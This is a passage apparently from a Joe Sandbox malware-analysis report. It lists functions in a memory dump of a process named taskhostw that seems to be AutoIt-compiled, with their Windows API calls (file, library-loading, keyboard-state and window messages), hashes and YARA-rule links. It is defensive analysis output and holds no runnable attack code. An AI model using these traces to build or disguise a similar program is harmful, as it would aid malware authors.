Instruction Fuzzy Hash: 3761BEB060020A9FCB60DF54C881ABABBF5EF05300F14807DEA569B291D774ED52CBA2

Function 00D02123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c03cd61c481c89b990a9274dbc0e30668147faad746c7d0fbca2f495f42662fc
Instruction ID: 6799fd9a082070badd02f9a1c5292e38c3a3c39c5b209801568623e0939f7631
Opcode Fuzzy Hash: c03cd61c481c89b990a9274dbc0e30668147faad746c7d0fbca2f495f42662fc
Instruction Fuzzy Hash: 3E516135600604ABCF14EB64C996FBD77A5AF45310F158168FA4A6B392DB30ED01DB72

Function 00CF5C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000), ref: 00CF5CF6

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 87a09ba53ce10531750afc052f2384d70e5bba8a3deee4bc2d5dc5a1b39b3457
Instruction ID: 82f6c933de8a8082ab76b0033bd1a9c86b15995aa99676c90c1917530b5202ed
Opcode Fuzzy Hash: 87a09ba53ce10531750afc052f2384d70e5bba8a3deee4bc2d5dc5a1b39b3457
Instruction Fuzzy Hash: 0A315C31A00B19AFCB58DF2DC584A6DB7B1FF48310F158629DB2993710D771A950DB91

Function 00D30005 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00D30010

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: fc032b47a19a9f5ad9bd65e0f9bc78d976ce27b80cee9a2b4727863d29a1eaa6
Instruction ID: e9b31b1154e529d152c5fd6a0f5254427fa4588935949bd2a907c7ccbf9a5f15
Opcode Fuzzy Hash: fc032b47a19a9f5ad9bd65e0f9bc78d976ce27b80cee9a2b4727863d29a1eaa6
Instruction Fuzzy Hash: 784119745043459FDB64DF14C494B2ABBE0BF45318F19889CE5998B362C772EC85CB62

Function 00CF7CB3 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00CF7D13

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: c2e148a0d0d608756d7e64136368d20490e20978a686fed34a7653a647617070
Instruction ID: 924b8fc00ef1dae1aa7debc9635fa9f8b24c771b913b6fa23870b1ca88fc3f03
Opcode Fuzzy Hash: c2e148a0d0d608756d7e64136368d20490e20978a686fed34a7653a647617070
Instruction Fuzzy Hash: 0A213072604A28EBCB108F26F9417B97BB4EF24354F21892EE486C8191EB3081E08322

Function 00CF5B19 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00CF5B61

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 776cc2851ffe8a36a0c7fde1b963be450a6451ea6227c0b8ea6b993add224064
Instruction ID: a95ea9e9abf9055499fae0632635f83fb80ba7cfe3ab54236ca11997926bcc2a
Opcode Fuzzy Hash: 776cc2851ffe8a36a0c7fde1b963be450a6451ea6227c0b8ea6b993add224064
Instruction Fuzzy Hash: F3216230900B28EBCB209F51F8816AE7FF8EF24350F21842AF686C9111EBB085D0C776

Function 00CF4F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CF4D13: FreeLibrary.KERNEL32(00000000,?), ref: 00CF4D4D

Part of subcall function 00D153CB: __wfsopen.LIBCMT ref: 00D153D6

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00DB52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00CF4F6F

Part of subcall function 00CF4CC8: FreeLibrary.KERNEL32(00000000), ref: 00CF4D02

Part of subcall function 00CF4DD0: _memmove.LIBCMT ref: 00CF4E1A

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: d107d6e20497225a1c00c993756ba976fb565714f3a27fd8e9b1793a5c6d63b7
Instruction ID: a14ce9e89c618a43da085045067e339377e9fc7d6612a0c4febb8c34bbe68ab3
Opcode Fuzzy Hash: d107d6e20497225a1c00c993756ba976fb565714f3a27fd8e9b1793a5c6d63b7
Instruction Fuzzy Hash: FC11043160020DAACB68AF64D812BBE73A59F44700F108829FB45A61C1DE758A05B762

Function 00D300DE Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00D300EA

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: b891c5aa3ee86bddcd6ca45c33f81dbb8838262b180ec3eda82935be7c3f7e57
Instruction ID: 18d1d4a52d4e325014f8f576a354cc97a391a913d3e7231eb8702b0822cf4977
Opcode Fuzzy Hash: b891c5aa3ee86bddcd6ca45c33f81dbb8838262b180ec3eda82935be7c3f7e57
Instruction Fuzzy Hash: F42130B4508305DFCB64DF14C845B6ABBE0BF88304F058968E99A87721D731E859CBA3

Function 00CF5D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,00010000,?,00000000), ref: 00CF5D76

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 60300177f137c2be0aaa1b479f81b1310c56ce5c6c26dbc8a85ba950cdc4d39a
Instruction ID: 658dd5f595fe95f10d061fc8ec825140b4e5e38634353f8ca1fe8b7122408625
Opcode Fuzzy Hash: 60300177f137c2be0aaa1b479f81b1310c56ce5c6c26dbc8a85ba950cdc4d39a
Instruction Fuzzy Hash: F3113A31201B099FD3708F15C584B62B7E5EF45750F10C92EE7AA86A50D770E945CF61

Function 00CF5BDA Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00D2E071

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 8e1bb85ac63864fbec019602ce91a61be3e0d1636a295fffd4c0df93f9d1a386
Instruction ID: c489f1573f5f85f390ce04d8f40a27a04b4a9f9deacf5dcca2ed09bdaf358e44
Opcode Fuzzy Hash: 8e1bb85ac63864fbec019602ce91a61be3e0d1636a295fffd4c0df93f9d1a386
Instruction Fuzzy Hash: 7401BCB4600502ABC305EB68D542D26FBA9FF8A3143148159FA19C7702DB71EC22CBE1

Function 00D149D3 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00D14A16

Part of subcall function 00D18CA8: __getptd_noexit.LIBCMT ref: 00D18CA8

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 543d407ec7a2bbb07d261f8e81efdd427809ce771f414a4c1486220156bd929c
Instruction ID: 496d9e8d60c5c7178fff0b29ed4bb3473f46aa5838766c61bf9355fd588bf551
Opcode Fuzzy Hash: 543d407ec7a2bbb07d261f8e81efdd427809ce771f414a4c1486220156bd929c
Instruction Fuzzy Hash: 86F0AF31940205BBDF11AFA4AC063DF76A1EF01329F098514F424AB191DF78C991EBB1

Function 00CF4FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00DB52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00CF4FDE

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 6ff86548bcdccc46afdf4d05b56003d3476c965f81a3c7cb97bd3e4dc12c1a16
Instruction ID: 93389218290925b51aee096f427768bfe7f588affd8076aa679054c51b55cbc3
Opcode Fuzzy Hash: 6ff86548bcdccc46afdf4d05b56003d3476c965f81a3c7cb97bd3e4dc12c1a16
Instruction Fuzzy Hash: 2AF03071105716CFC7789FA5E494823BBF1BF043253108A3EE6DB82610C7319980DF51

Function 00D10911 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF,?,?,?,00CF741D,00000001,00DB6290,?,00CF3BCD,00DB52F8,00DB52E0,?,?), ref: 00D10930

Part of subcall function 00CF7D2C: _memmove.LIBCMT ref: 00CF7D66

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: b4c5f31b13f9ce5b4bccff3d28c542cd0eb282924f79664bce55a789bb73dbe4
Instruction ID: a5c428597701531fb75075f11d247e27362e7ee4af59cb99b9ae200ef54aad5b
Opcode Fuzzy Hash: b4c5f31b13f9ce5b4bccff3d28c542cd0eb282924f79664bce55a789bb73dbe4
Instruction Fuzzy Hash: F8E0863690522857C720D6589C06FFA77EDDF88690F0441B5FD0CD7215D9605C8186A1

Function 00D58F48 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00D58F6A

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 87e92921201f7f350e3b6a5d32947fae34ea2a0dab1f5900b9b8b54ddfacd81a
Instruction ID: ab74630cdcefcd08f464cc45bfc9d4309ebbb8191f9101beca17b7c1f4cb38ee
Opcode Fuzzy Hash: 87e92921201f7f350e3b6a5d32947fae34ea2a0dab1f5900b9b8b54ddfacd81a
Instruction Fuzzy Hash: B7E092B1608B009BDB348A24E8017E373E1EF09305F04081CFA9AD3241EF63B845CB69

Function 00D12DC4 Relevance: 1.5, APIs: 1, Instructions: 16COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00D13397: __lock.LIBCMT ref: 00D13399

__onexit_nolock.LIBCMT ref: 00D12DE0

Part of subcall function 00D12E08: RtlDecodePointer.NTDLL(?,00000000,00000000,?,?,00D12DE5,00D2B73A,00DA9ED0), ref: 00D12E1B
Part of subcall function 00D12E08: DecodePointer.KERNEL32(?,?,00D12DE5,00D2B73A,00DA9ED0), ref: 00D12E26
Part of subcall function 00D12E08: __realloc_crt.LIBCMT ref: 00D12E67
Part of subcall function 00D12E08: __realloc_crt.LIBCMT ref: 00D12E7B
Part of subcall function 00D12E08: EncodePointer.KERNEL32(00000000,?,?,00D12DE5,00D2B73A,00DA9ED0), ref: 00D12E8D
Part of subcall function 00D12E08: EncodePointer.KERNEL32(00D2B73A,?,?,00D12DE5,00D2B73A,00DA9ED0), ref: 00D12E9B
Part of subcall function 00D12E08: EncodePointer.KERNEL32(00000004,?,?,00D12DE5,00D2B73A,00DA9ED0), ref: 00D12EA7

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Pointer$Encode$Decode__realloc_crt$__lock__onexit_nolock
String ID:
API String ID: 3536590627-0
Opcode ID: b209a1fcbb4a9656d2365dc030df7b42abdbb13033ad6d15deb18221a4774931
Instruction ID: e3083246235f68447fdb1cbce4bc501d6bb3132b0d467ffe060da98db7e5cf5c
Opcode Fuzzy Hash: b209a1fcbb4a9656d2365dc030df7b42abdbb13033ad6d15deb18221a4774931
Instruction Fuzzy Hash: 79D01272E51209BBDB10FBA4A8067ED76A0EF00723F544145F014A61C2CF7447829BB5

Function 00CF5DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001), ref: 00CF5DBF

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: a9353952838d75ad87eab906fb5ac6ab5c5d518811a9ab3dd751345db283d692
Instruction ID: b63852bebe87c450b9f3c2adc3012e7322d10e95545583f1cb34b6350377c212
Opcode Fuzzy Hash: a9353952838d75ad87eab906fb5ac6ab5c5d518811a9ab3dd751345db283d692
Instruction Fuzzy Hash: D4D0C77464030CBFE710DB80DC46FA9777CE705710F500194FD0496790E6B27D508795

Function 00D153CB Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00D153D6

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 41980131e0a5948bbc58741d8a4e19caaf5dc5921f83d34049cf1444c01f3d8f
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 6CB09B7544010C77CE011941FC02A457B59D740794F404010FB1C191619577A5705595

Function 00D5D107 Relevance: 1.4, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000002,00000000), ref: 00D5D28B

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 4704d9f6924e9862730ec458e4a4da28b075b1fdcbef9ac48db2c8e9dd7cf10f
Instruction ID: 8898f1763c8dd176dc4b64cd23c661f82cb8d01e01aed22625a8b2b60dadac43
Opcode Fuzzy Hash: 4704d9f6924e9862730ec458e4a4da28b075b1fdcbef9ac48db2c8e9dd7cf10f
Instruction Fuzzy Hash: BD716E302047058FCB54EF24C591A6AB7E1EF88315F08456DFE968B2A2DB30E949DB77

Function 00D10D88 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32 ref: 00D10E37

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: b2a034976b04ed9bba0b1cf15d35600548bf18f0ed92e6cb89d407c8324cf57d
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 7531D774A00105EBC718EF59E5809A9FBA6FF49300B6886A5E449CF655DB70EDC1CBA0

Non-executed Functions

Function 00D7CB26 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00CF2612: GetWindowLongW.USER32(?,000000EB), ref: 00CF2623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00D7CBA1
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D7CBFF
GetWindowLongW.USER32(?,000000F0), ref: 00D7CC40
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00D7CC6A
SendMessageW.USER32 ref: 00D7CC93
_wcsncpy.LIBCMT ref: 00D7CCFF
GetKeyState.USER32(00000011), ref: 00D7CD20
GetKeyState.USER32(00000009), ref: 00D7CD2D
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D7CD43
GetKeyState.USER32(00000010), ref: 00D7CD4D
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00D7CD76
SendMessageW.USER32 ref: 00D7CD9D
SendMessageW.USER32(?,00001030,?,00D7B37C), ref: 00D7CEA1
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00D7CEB7
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00D7CECA
SetCapture.USER32(?), ref: 00D7CED3
ClientToScreen.USER32(?,?), ref: 00D7CF38
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00D7CF45
InvalidateRect.USER32(?,00000000,00000001), ref: 00D7CF5F
ReleaseCapture.USER32(?,?,?), ref: 00D7CF6A
GetCursorPos.USER32(?), ref: 00D7CFA4
ScreenToClient.USER32(?,?), ref: 00D7CFB1
SendMessageW.USER32(?,00001012,00000000,?), ref: 00D7D00D
SendMessageW.USER32 ref: 00D7D03B
SendMessageW.USER32(?,00001111,00000000,?), ref: 00D7D078
SendMessageW.USER32 ref: 00D7D0A7
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00D7D0C8
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00D7D0D7
GetCursorPos.USER32(?), ref: 00D7D0F7
ScreenToClient.USER32(?,?), ref: 00D7D104
GetParent.USER32(?), ref: 00D7D124
SendMessageW.USER32(?,00001012,00000000,?), ref: 00D7D18D
SendMessageW.USER32 ref: 00D7D1BE
ClientToScreen.USER32(?,?), ref: 00D7D21C
TrackPopupMenuEx.USER32 ref: 00D7D24C
SendMessageW.USER32(?,00001111,00000000,?), ref: 00D7D276
